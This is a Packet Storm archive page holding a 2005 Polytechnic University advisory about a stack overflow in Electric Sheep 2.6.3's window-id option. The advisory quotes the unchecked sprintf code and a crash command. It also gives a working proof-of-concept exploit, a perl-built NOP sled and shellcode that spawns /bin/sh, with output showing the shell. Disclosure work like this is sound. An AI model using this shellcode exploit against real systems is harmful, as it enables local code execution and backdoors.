exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

es263-windows-id.txt

es263-windows-id.txt
Posted Dec 31, 2005
Authored by Daniel Guido, Michael Aiello | Site michaelaiello.com

Electric Sheep version 2.6.3 suffers from a stack overflow in the windows-id parameter. Note that it is not setuid by default.

tags | advisory, overflow
systems | windows
SHA-256 | 637e767deb9f57a0e6465433adc14495207554e9f117a7669575c6eaa7b3f610

es263-windows-id.txt

Change Mirror Download
 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Polytechnic University ISIS Security Advisory PUISIS10202005
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://isis.poly.edu
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
~ Application: Electric Sheep v2.6.3
~ Severity: Normal
~ Title: Electric Sheep window-id stack overflow
~ Date: October 20, 2005
~ ID: PUISIS10202005
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Summary
=======
Due to insufficient bounds checking, a lengthy window-id parameter can
cause a stack based buffer overflow to occur allowing execution of
arbitrary code with the privileges of the invoking user. This could
potentially be used as a backdoor entry point.

Background
==========
"Electric Sheep is a free, open source screen saver run by thousands of
people all over the world. It can be installed on any ordinary PC or
Mac. When these computers "sleep", the screen saver comes on and the
computers communicate with each other by the internet to share the work
of creating morphing abstract animations known as "sheep".
http://electricsheep.org/

Description
===========
electricsheep.c

419:
default_background(char *more) {
char ob[MAXBUF];
char pbuf[MAXBUF];
char qbuf[MAXBUF];

if (nobg || (!on_root && !window_id)) return;
if (more)
sprintf(ob, "-merge -at 500,0 s.tif",
splash_prefix, more);
else
ob[0] = 0;

if (window_id)
sprintf(qbuf, "-windowid %s", window_id); //no bounds checking on qbuf

Because window_id comes directly from the command line, a malicious
user has the potential to supply a window_id larger than MAXBUF and
corrupt sorrounding memory. The vulnerability can be seen by executing
the following command.

electricsheep -window-id `perl -e '{print "A"x"40000";}'`

Bad integer argument for the windowid option
Usage: xsetbg [global options] {[image options] image_name ...}
Type `xsetbg -help [option ...]' for information on a particular option, or
`xsetbg -help' to enter the interactive help facility.
subprocess failure: splash0, 256=1<<8+0
Segmentation fault

An exploit spawing /bin/sh on SUSE Linux

narain@(none):~/electricsheep-2.6.3> electricsheep -window-id `perl -
e '{print "\x90"x"200"; print "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46
\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb
\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"; print "B"x"532";print
"\x80\xc4\xfd\xbf"; print "C"x"39219";}'`

Bad integer argument for the windowid option

Usage: xsetbg [global options] {[image options] image_name ...}

Type `xsetbg -help [option ...]' for information on a particular option, or
`xsetbg -help' to enter the interactive help facility.
subprocess failure: splash0, 256=1<<8+0
sh-3.00$ whoami
narain
sh-3.00$


Impact
======
This local exploit to the sheep client does not pose a significant
threat as electricsheep does not setuid(0). However, local exploits
may be used as mechanisms for subvert command execution once a system
has been compromised or used to create backdoors.

Workaround
==========
The vendor was notified on November 18, 2005. The vendor was extremely
responsive and cooperative in regards to these security issues. All
issues are fixed in the CVS HEAD of Electric Sheep client development
and will be included in the next release.

About
=====
The Information Systems and Internet Security (ISIS) Laboratory is
an NSF funded laboratory designed to facilitate hands-on
experimentation and project work in issues related to information
security. It provides the focus for multidisciplinary research and
education in emerging areas of security. Polytechnic University, an
NSA Center of Academic Excellence in Information Assurance Education,
houses the lab.

This vulnerability was discovered during coursework performed for
"Penetration Testing & Vulnerability Analysis" offered at
Polytechnic University (http://www.poly.edu) during the Fall 2005
semester.

License
=======
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5

Authors
=======
Michael Aiello http://www.michaelaiello.com
Daniel Guido dguido@gmail.com


Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    6 Files
  • 17
    Jul 17th
    34 Files
  • 18
    Jul 18th
    6 Files
  • 19
    Jul 19th
    34 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close